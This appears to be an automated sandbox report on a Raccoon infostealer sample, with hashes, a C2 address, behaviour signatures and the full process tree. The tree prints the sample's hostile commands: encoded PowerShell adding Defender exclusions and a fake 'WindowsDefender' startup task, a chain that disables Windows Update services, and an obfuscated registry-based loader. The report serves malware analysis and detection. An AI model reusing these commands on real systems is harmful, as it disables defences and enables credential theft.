Analysis
-
max time kernel
81s -
max time network
86s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
29-08-2022 19:26
General
-
Target
44d537a1177052bda245325ade50bc0c.exe
-
Size
1.7MB
-
MD5
44d537a1177052bda245325ade50bc0c
-
SHA1
30e0f857a99fb9dbae1089d27b5b93684f27db40
-
SHA256
36bd02986dce2eed41c7de5ba2fad40054dc7c3afa853837eca3e5aec8c97cd0
-
SHA512
d370cdbd0f8197a24bb8664ab99058424bcf0ca251cb0b363fc8964f19ba81d7dedad9777f04a09e11d319573d4b7d51534379a335b6cf4f6650aa0ab84468be
-
SSDEEP
24576:cErC3wTvofxmxKvKwjUWlq5Qmt1GZ5Ucq1DmE8ctw/idkxChx4Q:HrcagfxWvv59bGz8mEq/iWxChxd
Malware Config
Extracted
raccoon
94476028cb01373a9a79593d7fce091e
http://185.225.17.198
Signatures
-
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 3 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 40 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\44d537a1177052bda245325ade50bc0c.exe"C:\Users\Admin\AppData\Local\Temp\44d537a1177052bda245325ade50bc0c.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\5zx28kz3.exe"C:\Users\Admin\AppData\Roaming\5zx28kz3.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\5zx28kz3.exe"4⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="5⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "WindowsDefender"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\5zx28kz3.exe"5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Program Files\Platform\Defender\update.exe"C:\Program Files\Platform\Defender\update.exe"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ae768173-207f-46dc-82c0-d4205f3fc59b}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Platform\Defender\update.exeFilesize
2.3MB
MD5951a4d5af977fba734ecd883ff841288
SHA11b133aee54c12373c7d79995857cb50673e9dae3
SHA256d2de2453de89328052e557a96c86fbcfde26107bcd04d637632f1c2cfc36f3fc
SHA512b88d5d8398086ec4b8d1af0ba408edb071853c7cffaf54959fdbe752af5bcda050c6c9d92ed9b9791088c75df1fa865c2a206594f05533a0771dd2946d66cc1b
-
C:\Program Files\Platform\Defender\update.exeFilesize
2.9MB
MD5adef5a7ef4053b4cb0fb26a6f92280a7
SHA19f530f826c76b6f16dae0e5098ddb40bada70ebc
SHA2560fa7de3fe1ee0caac4e400ba96b21dcb617980d3f23e94ffc37488721ec8f948
SHA51262bcffffa88b90b0fb40d18a7497c07616dfb767871d23a69e8d4fb9be743b92e5b3ce4e3e01e29bd83dca20abed8910cd3b066f7e421e011bdd1cb8c275b182
-
C:\Users\Admin\AppData\LocalLow\mozglue.dllFilesize
612KB
MD5f07d9977430e762b563eaadc2b94bbfa
SHA1da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA2564191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA5126afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
C:\Users\Admin\AppData\LocalLow\nss3.dllFilesize
1.9MB
MD5f67d08e8c02574cbc2f1122c53bfb976
SHA16522992957e7e4d074947cad63189f308a80fcf2
SHA256c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA5122e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
C:\Users\Admin\AppData\LocalLow\sqlite3.dllFilesize
1.0MB
MD5dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1bbac1dd8a07c6069415c04b62747d794736d0689
SHA25647b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5622bf737a997b9a257f15dc3b9ee9da5
SHA16beba023f9c081393b64de079969e948a47be8be
SHA256bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7
SHA512c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD523f3250d34a30040442e8a31561b2070
SHA1661eac43304c03de03c5a5a4885c0848e815f3ed
SHA256ff3b5994b1898b8fd7637429605acba777ea6fa43c683fddb4c89ada33cf3263
SHA512c7f2bcb72a9993c7f110d418a6e824a85a823c47b831719c3b68e2ef2bf83a3d649833b89a96a117e4a0f28192771d2898582d01402c3dd3fdd0720070a96cba
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Roaming\5zx28kz3.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Users\Admin\AppData\Roaming\5zx28kz3.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
\Users\Admin\AppData\Roaming\A95F.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/480-174-0x0000000000000000-mapping.dmp
-
memory/492-178-0x0000000000000000-mapping.dmp
-
memory/736-185-0x0000000000000000-mapping.dmp
-
memory/848-176-0x0000000000000000-mapping.dmp
-
memory/944-203-0x0000000000000000-mapping.dmp
-
memory/1068-198-0x0000000000000000-mapping.dmp
-
memory/1448-202-0x0000000000000000-mapping.dmp
-
memory/1492-179-0x0000000000000000-mapping.dmp
-
memory/1536-172-0x0000000000000000-mapping.dmp
-
memory/1848-167-0x00007FFD88BB0000-0x00007FFD89671000-memory.dmpFilesize
10.8MB
-
memory/1848-161-0x0000000000000000-mapping.dmp
-
memory/1848-162-0x000001B1DEFC0000-0x000001B1DEFE2000-memory.dmpFilesize
136KB
-
memory/1848-170-0x00007FFD88BB0000-0x00007FFD89671000-memory.dmpFilesize
10.8MB
-
memory/1848-169-0x000001B1DFE30000-0x000001B1DFE3A000-memory.dmpFilesize
40KB
-
memory/1848-168-0x000001B1DFE20000-0x000001B1DFE28000-memory.dmpFilesize
32KB
-
memory/1848-166-0x000001B1DFE10000-0x000001B1DFE1A000-memory.dmpFilesize
40KB
-
memory/1848-165-0x000001B1DFCB0000-0x000001B1DFCCC000-memory.dmpFilesize
112KB
-
memory/1932-188-0x0000000000000000-mapping.dmp
-
memory/1936-201-0x0000000000000000-mapping.dmp
-
memory/1948-159-0x00000207DEFF0000-0x00000207DF4C2000-memory.dmpFilesize
4.8MB
-
memory/1948-194-0x00000207F9E50000-0x00000207F9E62000-memory.dmpFilesize
72KB
-
memory/1948-160-0x00007FFD88BB0000-0x00007FFD89671000-memory.dmpFilesize
10.8MB
-
memory/1948-199-0x00007FFD88BB0000-0x00007FFD89671000-memory.dmpFilesize
10.8MB
-
memory/2032-171-0x0000000000000000-mapping.dmp
-
memory/2204-189-0x0000000000000000-mapping.dmp
-
memory/2244-211-0x0000000000000000-mapping.dmp
-
memory/2984-135-0x0000000005E10000-0x00000000063B4000-memory.dmpFilesize
5.6MB
-
memory/2984-134-0x0000000005720000-0x0000000005770000-memory.dmpFilesize
320KB
-
memory/2984-133-0x0000000005790000-0x0000000005842000-memory.dmpFilesize
712KB
-
memory/2984-132-0x0000000000170000-0x000000000031E000-memory.dmpFilesize
1.7MB
-
memory/2984-136-0x0000000005960000-0x00000000059F2000-memory.dmpFilesize
584KB
-
memory/2984-137-0x0000000005900000-0x0000000005922000-memory.dmpFilesize
136KB
-
memory/3040-210-0x0000000000000000-mapping.dmp
-
memory/3216-196-0x00007FF7D65C1844-mapping.dmp
-
memory/3340-186-0x0000000000000000-mapping.dmp
-
memory/3364-217-0x00007FFDA7260000-0x00007FFDA731E000-memory.dmpFilesize
760KB
-
memory/3364-216-0x00007FFDA7730000-0x00007FFDA7925000-memory.dmpFilesize
2.0MB
-
memory/3364-215-0x00007FFD896B0000-0x00007FFD8A171000-memory.dmpFilesize
10.8MB
-
memory/3496-212-0x0000000000000000-mapping.dmp
-
memory/3568-156-0x0000000000000000-mapping.dmp
-
memory/3672-208-0x0000000000000000-mapping.dmp
-
memory/3708-205-0x0000000000000000-mapping.dmp
-
memory/3812-175-0x0000000000000000-mapping.dmp
-
memory/3904-182-0x0000000000000000-mapping.dmp
-
memory/3912-184-0x0000000000000000-mapping.dmp
-
memory/4044-206-0x0000000000000000-mapping.dmp
-
memory/4052-190-0x0000000000000000-mapping.dmp
-
memory/4072-146-0x0000000000000000-mapping.dmp
-
memory/4072-209-0x0000000000000000-mapping.dmp
-
memory/4132-145-0x0000000006180000-0x000000000619A000-memory.dmpFilesize
104KB
-
memory/4132-144-0x00000000074C0000-0x0000000007B3A000-memory.dmpFilesize
6.5MB
-
memory/4132-141-0x0000000004F70000-0x0000000004FD6000-memory.dmpFilesize
408KB
-
memory/4132-142-0x0000000005680000-0x00000000056E6000-memory.dmpFilesize
408KB
-
memory/4132-140-0x0000000004FE0000-0x0000000005608000-memory.dmpFilesize
6.2MB
-
memory/4132-143-0x0000000005C70000-0x0000000005C8E000-memory.dmpFilesize
120KB
-
memory/4132-138-0x0000000000000000-mapping.dmp
-
memory/4132-139-0x0000000002380000-0x00000000023B6000-memory.dmpFilesize
216KB
-
memory/4228-204-0x0000000000000000-mapping.dmp
-
memory/4420-151-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4420-147-0x0000000000000000-mapping.dmp
-
memory/4420-155-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4420-148-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4420-150-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4480-173-0x0000000000000000-mapping.dmp
-
memory/4608-197-0x0000000000000000-mapping.dmp
-
memory/4612-181-0x0000000000000000-mapping.dmp
-
memory/4744-193-0x00007FFD88BB0000-0x00007FFD89671000-memory.dmpFilesize
10.8MB
-
memory/4744-192-0x00007FFD88BB0000-0x00007FFD89671000-memory.dmpFilesize
10.8MB
-
memory/4744-177-0x0000000000000000-mapping.dmp
-
memory/4816-200-0x0000000000000000-mapping.dmp
-
memory/4888-191-0x0000000000000000-mapping.dmp
-
memory/4900-218-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4900-219-0x00000001400033F4-mapping.dmp
-
memory/4900-220-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4900-221-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4900-222-0x00007FFDA7730000-0x00007FFDA7925000-memory.dmpFilesize
2.0MB
-
memory/4900-223-0x00007FFDA7260000-0x00007FFDA731E000-memory.dmpFilesize
760KB
-
memory/4920-207-0x0000000000000000-mapping.dmp
-
memory/5016-187-0x0000000000000000-mapping.dmp